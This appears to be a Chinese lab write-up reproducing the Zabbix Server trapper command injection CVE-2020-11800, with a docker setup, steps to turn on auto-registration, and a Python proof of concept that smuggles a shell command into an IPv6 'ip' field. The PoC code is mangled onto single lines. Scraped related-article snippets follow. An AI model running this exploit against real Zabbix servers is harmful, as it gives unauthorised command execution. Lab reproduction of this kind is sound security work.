(CVE-2020-11800)Zabbix_Server_trapper_命令注入漏洞
(CVE-2020-11800)Zabbix_Server_trapper_命令注入漏洞
20210508
一、漏洞简介
Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构,可用于监视各种网络服务、 服务器和网络机器等状态。在[CVE-2017-2824][1]中,其Server端 trapper command 功能存在一处代码执行漏洞,而修复补丁并不完善,导致可以利用IPv6进行绕过,注入任意命令。
二、漏洞影响
Zabbix 3.0至3.0.30
三、复现过程
1. 环境搭建
执行如下命令
docker-compose up -d
启动一个完整的Zabbix环境,包含Web端、Server端、Agent和Mysql数据库。
docker-compose ps
查看容器是否全部成功启动,Web端8080端口
2. 漏洞复现
访问页面 http://yourip:8080
利用该漏洞的前提:服务端开启了自动注册功能,所以我们先以管理员的身份开启自动注册功能。
(1)使用账号密码admin/zabbix登录后台,进入Configuration->Actions,将Event source调整为Auto registration
(2)然后点击Create action,创建一个Action,名字随便填,这里命名为test
(3)第三个标签页,创建一个Operation,Operation type是“Add Host”:保存。这样就开启了自动注册功能。
(4)新建的exp.py文件,POC代码:
import sys
import socket
import json
import sysdef send(ip, data):conn = socket.create_connection((ip, 10051), 10)conn.send(json.dumps(data).encode())data = conn.recv(2048)conn.close()return datatarget = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":"ffff:::;touch /tmp/success2"}))
for i in range(10000, 10500):data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})if data and b'failed' not in data:print('hostid: %d' % i)print(data)
(5)在将新建的exp.py文件放置在kail中。写入
python3 exp.py xxx.xxx.xxx.xxx #kail ip
当查看到如下结果时,则说明命令执行成功:
(6)进入server容器,可见/tmp/success2
已成功创建:
(不成功,可尝试重新执行docker-compose up -d)
(CVE-2020-11800)Zabbix_Server_trapper_命令注入漏洞相关推荐
- java 漏洞挖掘_Apache Tika命令注入漏洞挖掘
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤. ...
- OpenSSH 命令注入漏洞通告(CVE-2020-15778,Openssh <=8.3p1)
一.漏洞概要 2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开.OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者 ...
- 查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)
OpenSSH命令注入漏洞复现(CVE-2020-15778) 目录 漏洞描述 漏洞等级 漏洞影响版本 漏洞复现 修复建议 ▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现.通 ...
- openssh漏洞_技术干货 | OpenSSH命令注入漏洞复现(CVE202015778)
本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作! 欢迎各位添加 ...
- 对开源库 limdu 命令注入漏洞 (CVE-2020-4066) 的简要分析
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 开源库Limdu 的 trainBatch 函数中存在一个命令注入漏洞 (CVE-2020-4066). Limdu 是 Node.j ...
- 修改jar 注入_Apache Tika命令注入漏洞挖掘
介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤.CVE是https://nvd.nist.gov/vuln/detail/CVE-2018-1335.由于Apache ...
- 最新系统漏洞--QSAN SANOS命令注入漏洞
最新系统漏洞2021年10月21日 受影响系统: QSAN SANOS <= 2.0.0 (build 202012222000) 描述: CVE(CAN) ID: CVE-2021-32533 ...
- Foxit Reader(福昕阅读器)(CVE-2020-14425)命令注入漏洞复现
0x00简介 Foxit Reader,是一套用来阅读PDF格式文件的软件,由福建福昕软件所研发:2009年9月3日推出3.1.1 Build 0901最新版本.Foxit Reader是一套自由使用 ...
- 导致命令注入漏洞的php函数,PHP安全-函数
函数 在我写作本书的时候,http://www.gxlcms.com/列出了共3917个函数,其中包括一些类似函数的语法结构,在此我不准备把它们从函数中区分开来,而是把它作为函数看待. 由于函数数量很 ...
最新文章
- matlab fir工具箱,用MATLAB信號處理工具箱進行FIR濾波器設計的三種方法
- 图像处理之基础---周末戏说卷积
- 专题 17 SOCKET并发程序设计
- 【BZOJ4545】DQS的trie 后缀自动机+LCT
- 改造我们的学习:有钱不会花,抱着金库抓瞎
- Thread pool引起的程序连接数据库响应慢
- Spark自带的集群模式(Standalone),Spark/Spark-ha集群搭建
- 【Qt5.8】TypeError: Property 'asciify' of object Core问题解决办法
- centos修改磁盘uuid_为什么MySQL用uuid做主键会被骂?
- ubuntu dpkg
- qq浏览器网页翻译_如何通过Edge浏览器调用“谷歌翻译”,将整个网页翻译为中文...
- 51nod1355 斐波那契的最小公倍数
- 怎样编辑pdf文件?手把手教你如何使用PDF编辑器
- 数据库mysql视频马士兵,马士兵mysql视频的个人笔记
- springboot elementui vue商城微信小程序源码(毕设)开发讲解
- 在《自动化学报》搜无人机关键词可以看到这方面的论文
- 纳米数据世界杯数据,世界杯分组,世界杯赛程,世界杯实时比分api接口
- dataframe之按时间筛选数据
- 在程序中写一个“HelloJavaWorld你好世界“输出到操作系统文件Hello.txt文件中
- WxJava springboot微信支付商户直连分账使用总结
热门文章
- 【2022小米秋招(2023校招)】软件开发方向 笔试题1——链表反转
- matlab将一列数分割为若干组,将数据拆分为不同组并计算统计量
- LeetCode 0417「太平洋大西洋水流问题」
- 7-4 最短路径之Dijkstra(朴素dijkstra打印路径)
- Java学习笔记——Number类
- extern、struct等关键字
- java计算机毕业设计高原特色农产品网站设计MyBatis+系统+LW文档+源码+调试部署
- Hive坑之Where语句的“不等于”
- iptables禁止访问某个域名
- 量子计算机英语的ppt,量子计算机简介.ppt